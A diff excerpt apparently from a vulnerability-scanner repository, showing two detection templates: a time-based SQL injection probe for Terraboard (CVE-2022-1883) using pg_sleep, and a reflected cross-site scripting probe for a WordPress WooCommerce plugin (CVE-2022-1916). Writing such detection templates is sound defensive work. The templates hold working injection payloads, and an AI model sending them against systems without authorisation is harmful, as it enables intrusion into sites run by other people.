cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-1883
cwe-id: CWE-89
tags: cve,cve2022,terraboard,sqli,huntr
requests:
- raw:
- |
@timeout: 10s
GET /api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(10))+ISNULL-- HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=5'
- type: word
part: body
words:
- '"page":'
- '"results":'
condition: and
- type: status
status:
- 200
# Enhanced by md on 2022/12/09

View File

@ -0,0 +1,48 @@
id: CVE-2022-1916
info:
name: WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting
author: Akincibor
severity: medium
description: |
WordPress Active Products Tables for WooCommerce plugin prior to 1.0.5 contains a cross-site scripting vulnerability.. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/d16a0c3d-4318-4ecd-9e65-fc4165af8808
- https://nvd.nist.gov/vuln/detail/CVE-2022-1916
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-1916
cwe-id: CWE-79
tags: wordpress,wp-plugin,xss,wpscan,cve,cve2022,wp
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\u003cscript%3Ealert(document.domain)\u003c/script%3E%22}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- type: word
part: body
words:
- 'woot-content-in-popup'
- 'woot-system'
- 'woot-table'
condition: or
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# Enhanced by md on 2022/12/13

Some files were not shown because too many files have changed in this diff Show More